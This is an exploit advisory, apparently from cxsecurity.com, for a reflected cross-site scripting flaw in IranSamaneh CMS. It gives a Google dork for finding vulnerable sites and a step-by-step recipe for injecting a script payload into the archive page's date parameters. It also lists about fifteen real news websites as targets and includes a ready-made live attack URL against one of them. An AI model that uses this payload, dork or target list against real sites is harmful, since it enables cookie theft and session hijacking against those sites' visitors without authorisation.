IranSamaneh CMS Cross Site Scripting

Published
Credit
Risk
2017.04.05
Zero Security Group
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو

##########################
# Exploit Title: IranSamaneh CMS Cross Site Scripting
# Google Dork: intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو
# Date: 2017-04-05
# Exploit Author: Sh4dow
# My Team:Zero Security Group
# Vendor Homepage: https://iransamaneh.com/
# Software Link: -
# Version: all
# Tested on: Kali Linux
# CVE : -
##########################

Description:
IranSamaneh System design and development of web-based systems designed to host corporate portal News Agency

-----------------
Proof

Step To Step Do It:
1- Use Dork In Google And Choose a Site:
2- Change URL(fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2)
3- Now Use XSS Script in (from_data= or to_data=)
#
ExampleDemo Bypass Script:
( `'"><b><script>alert(document.cookie)</script></b> )
#
Demo:
http://tabnak.ir/
http://yjc.ir/
http://www.irinn.ir/
http://iribnews.ir//
http://kayhan.ir//
http://csr.ir
http://www.mashreghnews.ir/
http://www.fardanews.com/
http://navideshahed.com/
http://aghigh.ir/
http://www.seratnews.ir/
http://pedalnews.ir/
http://iana.ir/
http://apic.co/
http://javanonline.ir/

# You can Finde Many Site by using Google Dork
----------------------------------------

Live Demo:
http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=`%27%22%3E%3Cb%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/b%3E&p=2
----------------------------------------
#
#
Msg:Brother SOLTAN SILENT Returned
#
#---------------------------------------
# Greetz :Ghostman And My Pc
# We Are:Sh4dow - Ghostman - SOLTAN SILENT - And All Member
# Iranian Underground Researchers
# https://telegram.me/ZeroSecOfficial


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com